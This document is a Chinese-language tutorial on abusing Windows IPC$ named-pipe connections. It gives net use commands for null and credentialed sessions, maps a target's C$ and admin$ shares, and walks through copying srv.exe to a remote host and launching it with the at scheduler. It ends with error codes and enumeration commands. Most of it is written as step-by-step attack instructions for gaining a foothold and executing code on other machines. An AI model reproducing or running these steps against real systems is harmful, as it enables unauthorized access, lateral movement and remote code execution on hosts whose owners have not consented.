0x01 簡介
IPC$(Internet Process Connection)是共享”命名管道”的資源,它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。
利用IPC$,連接者甚至可以與目標主機建立一個連接,利用這個連接,連接者可以得到目標主機上的目錄結構、用戶列表等信息。
0x02 利用條件
1.139,445端口開啟:ipc$連接可以實現遠程登陸及對默認共享的訪問;而139端口的開啟表示netbios協議的應用,我們可以通過139,445(win2000)端口實現對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.
2.管理員開啟了默認共享:默認共享是為了方便管理員遠程管理而默認開啟的共享,即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問
0x03 操作命令
1.建立IPC$空連接
net use \\127.0.0.1\Iipc$ "" /user:""
2.建立完整的用戶名,密碼連接
net use \\127.0.0.1\ipc$ "password" /user:"username"
3.映射路徑
net use z: \\127.0.0.1\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
4.訪問/刪除路徑:
net use z: \\127.0.0.1\c$ #直接訪問
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
5.刪除IPC$連接
net use \\127.0.0.1\ipc$ /del
6.域中進行IPC$連接
net use\\去連接的IP地址\ipc$ "域成員密碼" /user:域名\域成員賬號
net use\\192.168.100.1\ipc$ "admin123.." /user:momaek.com\win2003
dir \\momaek.com\c$
copy test.exe \\momaek.com\c$
net use \\192.168.100.1\ipc$ /del
0x04 使用實例
4.1 構建連接
C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這里密碼原本就是為"空"
4.2 上傳exe
C:\>copy srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什么地方去了)。
4.3 查看時間
C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2019/2/8 上午 11:00,命令成功完成。
4.4 運行程序
C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然無法啟動)
0x05 IPC$連接失敗的原因
1.你的系統不是NT或以上操作系統.
2.對方沒有打開ipc$默認共享。
3.不能成功連接目標的139,445端口.
4.命令輸入錯誤.
5.用戶名或密碼錯誤.
0x06 常見錯誤號
1.錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員權限的,先提升權限;
2.錯誤號51,Windows 無法找到網絡路徑:網絡有問題;
3.錯誤號53,找不到網絡路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(端口過濾);
4.錯誤號67,找不到網絡名:你的lanmanworkstation服務未啟動;目標刪除了ipc$;
5.錯誤號1219,提供的憑據與已存在的憑據集沖突:你已經和對方建立了一個ipc$,請刪除再連。
6.錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
7.錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動:目標NetLogon服務未啟動。(連接域控會出現此情況)
8.錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。
0x07 其他知識點
net share #查看自己的共享
net view \\IP #查看target-IP的共享
netstat -A IP #獲取target-IP的端口列表
netstat -ano | findstr "port" #查看端口號對應的PID
tasklist | findstr "PID" #查看進程號對應的程序